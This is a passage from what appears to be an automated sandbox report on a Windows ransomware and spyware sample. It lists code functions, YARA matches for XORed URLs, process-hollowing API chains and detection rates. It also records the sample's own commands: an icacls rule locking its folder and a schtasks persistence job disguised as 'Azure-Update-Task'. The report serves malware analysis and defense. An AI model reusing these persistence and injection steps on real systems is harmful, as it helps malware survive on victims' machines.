                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0040A7103_2_0040A710
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0040F7303_2_0040F730
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0044D7A13_2_0044D7A1
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0042C8043_2_0042C804
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0044D9DC3_2_0044D9DC
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_00449A713_2_00449A71
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_00443B403_2_00443B40
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0044ACFF3_2_0044ACFF
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0040DD403_2_0040DD40
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0040BDC03_2_0040BDC0
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0042CE513_2_0042CE51
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_00420F303_2_00420F30
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_00449FE33_2_00449FE3
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 5_2_03B2DBE05_2_03B2DBE0
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 5_2_03B30B005_2_03B30B00
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 5_2_03B2CA105_2_03B2CA10
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 5_2_03B4F9B05_2_03B4F9B0
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 5_2_03B4E9A35_2_03B4E9A3
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 5_2_03B2B0B05_2_03B2B0B0
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 5_2_03B230EE5_2_03B230EE
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 5_2_03B300D05_2_03B300D0
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 5_2_03B418D05_2_03B418D0
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 5_2_03B2B0005_2_03B2B000
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 5_2_03B2C7605_2_03B2C760
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 5_2_03B2E6E05_2_03B2E6E0
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0042E0036_2_0042E003
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0040D2406_2_0040D240
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0041E6906_2_0041E690
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0040F7306_2_0040F730
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_004819206_2_00481920
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_00427D6C6_2_00427D6C
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_00419F906_2_00419F90
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0050D0506_2_0050D050
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_004050576_2_00405057
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0040C0706_2_0040C070
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0042F0106_2_0042F010
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0050D0086_2_0050D008
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_004080306_2_00408030
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0050D0286_2_0050D028
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_004070E06_2_004070E0
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0050D0906_2_0050D090
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0050D0A86_2_0050D0A8
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_004101606_2_00410160
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_004021C06_2_004021C0
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0044237E6_2_0044237E
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_004054476_2_00405447
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_004054576_2_00405457
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_004084C06_2_004084C0
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0050C4E06_2_0050C4E0
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_004344FF6_2_004344FF
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_004495066_2_00449506
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0043E5A36_2_0043E5A3
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0044B5B16_2_0044B5B1
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0040A6606_2_0040A660
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_004096866_2_00409686
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_004067406_2_00406740
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_004027506_2_00402750
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0040A7106_2_0040A710
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_004087806_2_00408780
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0044D7A16_2_0044D7A1
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0042C8046_2_0042C804
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_004068806_2_00406880
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0050C9606_2_0050C960
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 6_2_0050C9286_2_0050C928
                  Source: Ln0LqSBLhS.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Ln0LqSBLhS.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Ln0LqSBLhS.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Ln0LqSBLhS.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Ln0LqSBLhS.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Ln0LqSBLhS.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Ln0LqSBLhS.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Ln0LqSBLhS.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: build2[1].exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: build2[1].exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: build2[1].exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: build2[1].exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: build2.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: build2.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: build2.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: build2.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Ln0LqSBLhS.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                  Source: 6.1.Ln0LqSBLhS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                  Source: 9.1.Ln0LqSBLhS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                  Source: 7.2.Ln0LqSBLhS.exe.3c115a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                  Source: 3.1.Ln0LqSBLhS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                  Source: 5.2.Ln0LqSBLhS.exe.3b215a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                  Source: 3.2.Ln0LqSBLhS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                  Source: 9.2.Ln0LqSBLhS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                  Source: 5.2.Ln0LqSBLhS.exe.3b215a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                  Source: 2.2.Ln0LqSBLhS.exe.3c415a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                  Source: 7.2.Ln0LqSBLhS.exe.3c115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                  Source: 2.2.Ln0LqSBLhS.exe.3c415a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                  Source: 3.1.Ln0LqSBLhS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                  Source: 6.2.Ln0LqSBLhS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                  Source: 6.2.Ln0LqSBLhS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                  Source: 6.1.Ln0LqSBLhS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                  Source: 3.2.Ln0LqSBLhS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                  Source: 9.1.Ln0LqSBLhS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                  Source: 9.2.Ln0LqSBLhS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                  Source: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                  Source: 00000006.00000001.243226905.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                  Source: 00000003.00000001.234275088.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                  Source: 00000009.00000002.251711400.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                  Source: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                  Source: 00000009.00000001.247371622.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: String function: 00428C81 appears 46 times
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: String function: 00420EC2 appears 31 times
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: String function: 03B48EC0 appears 38 times
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: String function: 004547A0 appears 57 times
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: String function: 03C70160 appears 31 times
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: String function: 0042F7C0 appears 85 times
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: String function: 03B50160 appears 31 times
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: String function: 0044F23E appears 87 times
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: String function: 00428520 appears 100 times
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: String function: 00450870 appears 34 times
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: String function: 00454E50 appears 35 times
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: String function: 03C68EC0 appears 38 times
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: String function: 00441A25 appears 39 times
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 2_2_03C40110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,2_2_03C40110
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 5_2_03B20110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,5_2_03B20110
                  Source: Ln0LqSBLhS.exe, 00000006.00000003.265623026.000000000B120000.00000004.00000001.sdmpBinary or memory string: System.OriginalFileName vs Ln0LqSBLhS.exe
                  Source: Ln0LqSBLhS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: Ln0LqSBLhS.exe.3.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: build2[1].exe.6.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: build2.exe.6.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: Ln0LqSBLhS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile created: C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749Jump to behavior
                  Source: classification engineClassification label: mal100.rans.spyw.evad.winEXE@32/1411@6/4
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,3_2_00411900
                  Source: Ln0LqSBLhS.exeVirustotal: Detection: 42%
                  Source: Ln0LqSBLhS.exeMetadefender: Detection: 17%
                  Source: Ln0LqSBLhS.exeReversingLabs: Detection: 58%
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeFile read: C:\Users\user\Desktop\Ln0LqSBLhS.exeJump to behavior
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Ln0LqSBLhS.exe 'C:\Users\user\Desktop\Ln0LqSBLhS.exe'
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeProcess created: C:\Users\user\Desktop\Ln0LqSBLhS.exe 'C:\Users\user\Desktop\Ln0LqSBLhS.exe'
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749' /deny *S-1-1-0:(OI)(CI)(DE,DC)
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeProcess created: C:\Users\user\Desktop\Ln0LqSBLhS.exe 'C:\Users\user\Desktop\Ln0LqSBLhS.exe' --Admin IsNotAutoStart IsNotTask
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeProcess created: C:\Users\user\Desktop\Ln0LqSBLhS.exe 'C:\Users\user\Desktop\Ln0LqSBLhS.exe' --Admin IsNotAutoStart IsNotTask
                  Source: unknownProcess created: C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exe C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exe --Task
                  Source: C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exeProcess created: C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exe C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exe --Task
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeProcess created: C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exe 'C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exe'
                  Source: C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exeProcess created: C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exe 'C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exe'
                  Source: C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe'
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe'
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeProcess created: C:\Users\user\Desktop\Ln0LqSBLhS.exe 'C:\Users\user\Desktop\Ln0LqSBLhS.exe' Jump to behavior
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749' /deny *S-1-1-0:(OI)(CI)(DE,DC)Jump to behavior
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeProcess created: C:\Users\user\Desktop\Ln0LqSBLhS.exe 'C:\Users\user\Desktop\Ln0LqSBLhS.exe' --Admin IsNotAutoStart IsNotTaskJump to behavior
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeProcess created: C:\Users\user\Desktop\Ln0LqSBLhS.exe 'C:\Users\user\Desktop\Ln0LqSBLhS.exe' --Admin IsNotAutoStart IsNotTaskJump to behavior
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeProcess created: C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exe 'C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exe' Jump to behavior
                  Source: C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exeProcess created: C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exe C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exe --TaskJump to behavior
                  Source: C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exeProcess created: C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exe 'C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exe' Jump to behavior
                  Source: C:\Users\user\AppData\Local\e346cd35-2444-406b-9a28-805b44471c0b\build3.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe'
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe'
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,3_2_0040D240
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCode function: 3_2_00412440 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,3_2_00412440
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:808:120:WilError_01
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeMutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeMutant created: \Sessions\1\BaseNamedObjects\M5/610HP/STAGE2
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_01
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCommand line argument: --Admin6_2_00419F90
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCommand line argument: IsAutoStart6_2_00419F90
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCommand line argument: IsTask6_2_00419F90
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCommand line argument: --ForNetRes6_2_00419F90
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCommand line argument: IsAutoStart6_2_00419F90
                  Source: C:\Users\user\Desktop\Ln0LqSBLhS.exeCommand line argument: IsTask6_2_00419F90
